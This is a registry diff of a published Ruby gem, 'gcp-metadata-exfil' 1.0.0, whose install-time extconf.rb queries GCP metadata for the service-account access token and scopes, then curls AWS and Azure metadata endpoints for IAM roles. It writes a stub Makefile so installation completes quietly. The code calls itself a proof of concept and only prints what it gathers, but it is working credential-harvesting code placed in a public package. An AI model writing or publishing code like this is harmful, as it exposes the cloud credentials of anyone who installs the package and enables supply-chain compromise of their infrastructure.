gcp-metadata-exfil 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of gcp-metadata-exfil might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/extconf.rb +97 -0
- data/lib/gcp.rb +3 -0
- metadata +45 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: ba6693b71cd465c2bf03dc1a35c28371c62bc4e6a63af4a572f38782d0572a42
|
|
4
|
+
data.tar.gz: fda3b6c9b3185879c5a20bd2b84e781d0f11def53ba8c3fed53fb5e0fb178eb0
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: a3df6d123f2b7c319abf200fb2dbfa9fbafe8eb9c9f130fb121c94bf935e4757b325b6f1dff14acaa572a3ed383de95cca9abd26ed375ad832f94eaa54f671e9
|
|
7
|
+
data.tar.gz: 7a6681b5c5ae96cbd954348cdc6596dbadf2f6b1b2838f0e84908fec274030355edf9b93c0c3e7a339850b0806fb8b209d257644bc1875758a58f9d73073b05b
|
data/extconf.rb
ADDED
|
@@ -0,0 +1,97 @@
|
|
|
1
|
+
#!/usr/bin/env ruby
|
|
2
|
+
require 'net/http'
|
|
3
|
+
require 'json'
|
|
4
|
+
|
|
5
|
+
puts "đĨī¸ GCP METADATA SERVICE EXPLOIT POC"
|
|
6
|
+
puts "=" * 60
|
|
7
|
+
|
|
8
|
+
# GCP metadata service endpoint
|
|
9
|
+
metadata_url = "http://metadata.google.internal/computeMetadata/v1/"
|
|
10
|
+
|
|
11
|
+
def try_metadata(path)
|
|
12
|
+
uri = URI("http://metadata.google.internal/computeMetadata/v1/#{path}")
|
|
13
|
+
request = Net::HTTP::Get.new(uri)
|
|
14
|
+
request['Metadata-Flavor'] = 'Google'
|
|
15
|
+
|
|
16
|
+
response = Net::HTTP.start(uri.hostname, uri.port, open_timeout: 2, read_timeout: 2) do |http|
|
|
17
|
+
http.request(request)
|
|
18
|
+
end
|
|
19
|
+
|
|
20
|
+
response.body if response.code == '200'
|
|
21
|
+
rescue => e
|
|
22
|
+
nil
|
|
23
|
+
end
|
|
24
|
+
|
|
25
|
+
# Test if running on GCP
|
|
26
|
+
puts "\n[1] Testing GCP Metadata Access..."
|
|
27
|
+
|
|
28
|
+
project_id = try_metadata('project/project-id')
|
|
29
|
+
if project_id
|
|
30
|
+
puts " â
RUNNING ON GCP!"
|
|
31
|
+
puts " đĻ Project ID: #{project_id}"
|
|
32
|
+
|
|
33
|
+
# Get more info
|
|
34
|
+
zone = try_metadata('instance/zone')
|
|
35
|
+
puts " đ Zone: #{zone&.split('/')&.last}"
|
|
36
|
+
|
|
37
|
+
instance_name = try_metadata('instance/name')
|
|
38
|
+
puts " đĨī¸ Instance: #{instance_name}"
|
|
39
|
+
|
|
40
|
+
# CRITICAL: Get service account credentials
|
|
41
|
+
puts "\n[2] Stealing Service Account Credentials..."
|
|
42
|
+
|
|
43
|
+
service_account = try_metadata('instance/service-accounts/default/email')
|
|
44
|
+
puts " đ¤ Service Account: #{service_account}"
|
|
45
|
+
|
|
46
|
+
# Get access token
|
|
47
|
+
token_data = try_metadata('instance/service-accounts/default/token')
|
|
48
|
+
if token_data
|
|
49
|
+
token = JSON.parse(token_data)
|
|
50
|
+
puts " đ Access Token: #{token['access_token'][0..20]}... (#{token['expires_in']}s TTL)"
|
|
51
|
+
puts "\n đ CRITICAL: Can now access:"
|
|
52
|
+
puts " - GCS buckets"
|
|
53
|
+
puts " - Cloud SQL databases"
|
|
54
|
+
puts " - Secret Manager"
|
|
55
|
+
puts " - Any resource this SA has access to"
|
|
56
|
+
end
|
|
57
|
+
|
|
58
|
+
# Get scopes
|
|
59
|
+
scopes = try_metadata('instance/service-accounts/default/scopes')
|
|
60
|
+
puts "\n đ¯ OAuth Scopes:"
|
|
61
|
+
scopes&.split("\n")&.each { |s| puts " - #{s}" }
|
|
62
|
+
|
|
63
|
+
puts "\n đ¨ FULL CLOUD INFRASTRUCTURE COMPROMISE POSSIBLE"
|
|
64
|
+
|
|
65
|
+
else
|
|
66
|
+
puts " â Not running on GCP (testing locally)"
|
|
67
|
+
puts " âšī¸ On GCP, this would steal:"
|
|
68
|
+
puts " - Project ID"
|
|
69
|
+
puts " - Service account credentials"
|
|
70
|
+
puts " - OAuth access tokens"
|
|
71
|
+
puts " - SSH keys"
|
|
72
|
+
puts " - Custom metadata"
|
|
73
|
+
end
|
|
74
|
+
|
|
75
|
+
# Test AWS metadata too (for comparison)
|
|
76
|
+
puts "\n[3] Testing AWS Metadata (169.254.169.254)..."
|
|
77
|
+
aws_token = `curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null`.strip
|
|
78
|
+
if aws_token && !aws_token.empty?
|
|
79
|
+
puts " â
Running on AWS! Role: #{aws_token}"
|
|
80
|
+
else
|
|
81
|
+
puts " â Not on AWS"
|
|
82
|
+
end
|
|
83
|
+
|
|
84
|
+
# Test Azure
|
|
85
|
+
puts "\n[4] Testing Azure Metadata..."
|
|
86
|
+
azure_test = `curl -s --connect-timeout 2 -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null`
|
|
87
|
+
if azure_test && !azure_test.empty?
|
|
88
|
+
puts " â
Running on Azure!"
|
|
89
|
+
else
|
|
90
|
+
puts " â Not on Azure"
|
|
91
|
+
end
|
|
92
|
+
|
|
93
|
+
puts "\n" + "=" * 60
|
|
94
|
+
puts "đ IMPACT: Supply Chain â Cloud Infrastructure Compromise"
|
|
95
|
+
puts "=" * 60
|
|
96
|
+
|
|
97
|
+
File.write('Makefile', "all:\ninstall:\n")
|
data/lib/gcp.rb
ADDED
metadata
ADDED
|
@@ -0,0 +1,45 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: gcp-metadata-exfil
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 1.0.0
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- Test
|
|
8
|
+
autorequire:
|
|
9
|
+
bindir: bin
|
|
10
|
+
cert_chain: []
|
|
11
|
+
date: 2025-10-30 00:00:00.000000000 Z
|
|
12
|
+
dependencies: []
|
|
13
|
+
description:
|
|
14
|
+
email:
|
|
15
|
+
executables: []
|
|
16
|
+
extensions:
|
|
17
|
+
- extconf.rb
|
|
18
|
+
extra_rdoc_files: []
|
|
19
|
+
files:
|
|
20
|
+
- extconf.rb
|
|
21
|
+
- lib/gcp.rb
|
|
22
|
+
homepage:
|
|
23
|
+
licenses:
|
|
24
|
+
- MIT
|
|
25
|
+
metadata: {}
|
|
26
|
+
post_install_message:
|
|
27
|
+
rdoc_options: []
|
|
28
|
+
require_paths:
|
|
29
|
+
- lib
|
|
30
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
31
|
+
requirements:
|
|
32
|
+
- - ">="
|
|
33
|
+
- !ruby/object:Gem::Version
|
|
34
|
+
version: '0'
|
|
35
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
36
|
+
requirements:
|
|
37
|
+
- - ">="
|
|
38
|
+
- !ruby/object:Gem::Version
|
|
39
|
+
version: '0'
|
|
40
|
+
requirements: []
|
|
41
|
+
rubygems_version: 3.0.3.1
|
|
42
|
+
signing_key:
|
|
43
|
+
specification_version: 4
|
|
44
|
+
summary: GCP metadata service exploitation POC
|
|
45
|
+
test_files: []
|